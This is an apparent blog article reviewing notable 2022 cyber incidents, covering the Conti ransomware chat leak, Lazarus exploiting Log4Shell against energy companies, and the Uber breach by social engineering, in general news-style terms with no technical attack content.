Top hacks 2022 (part 1)

The 2022 has already ended, so we can summarize the year. In this article, we will briefly analyze some of the biggest cyber attacks around the world.

Hacking the hacker group Conti

The Conti ransomware group is one of the largest ransomware groups in existence. It was behind multiple hacks of high-profile organizations, including the governments of Costa Rica and Peru, multiple retailers, and critical infrastructure such as the Irish healthcare service.

In February 2022, after the group declared support for the Russian government as a result of the invasion of Ukraine, a researcher leaked the contents of the group’s private chats, revealing many internal details of how the organization functioned. According to the latest reports, In May 2022, the Conti ransomware group decided to do reorganization and rebranding; however, it is likely to continue to function while working with smaller groups. This could result in a greater diversity of high-quality ransomware with increased coordination between former members of the Conti ransomware group.

North Korea’s Lazarus hackers are exploiting Log4j flaw to hack US energy companies

Threat intelligence company Cisco Talos said that it has observed Lazarus — also known as APT38 — targeting unnamed energy providers in the United States, Canada and Japan between February and July 2022. According to Cisco’s research, the hackers used a year-old vulnerability in Log4j, known as Log4Shell, to compromise internet-exposed VMware Horizon servers to establish an initial foothold onto a victim’s enterprise network, before deploying bespoke malware known as “VSingle” and “YamaBot” to establish long-term persistent access. YamaBot was recently attributed to the Lazarus APT by Japan’s national cyber emergency response team, known as CERT.

Details of this espionage campaign were first revealed by Symantec in April this year, which attributed the operation to “Stonefly,” another North Korean hacking group that has some overlaps with Lazarus.

How Uber was hacked — again

An 18-year old hacker used social engineering techniques to compromise Uber’s network. He compromised an employee’s Slack login and then used it to send a message to Uber employees announcing that it had suffered a data breach. Uber confirmed the attack on Twitter within hours, issuing more details on this page. The company claims no user data was at risk, they have notified law enforcement, and all of their services have been restored to operational status. (There were some brief interruptions of various software tools but they are back online too). Uber now thinks the hacker is part of a hacking group called Lapsus$.

What’s interesting about this incident was the speed at which various publications and security analysts provided coverage, how quickly Uber notified the world, and how much detail we already have about what happened. Contrast this with another Uber hack back in 2016, when the personal information of about 57 million customers and drivers was stolen. That breach wasn’t made public for more than a year and resulted in Uber firing its Chief Security Officer, Joseph Sullivan. He is currently on trial for allegedly arranging to pay hackers $100,000 to cover things up and for the delay in disclosing the breach. The hackers were supposedly forced to sign non-disclosure agreements, an odd way to deal with the breach, to be sure.

If you know more interesting hacks for 2022, you can send them to the e-mail: formediumblogs@gmail.com for coverage or create a discussion in the comments.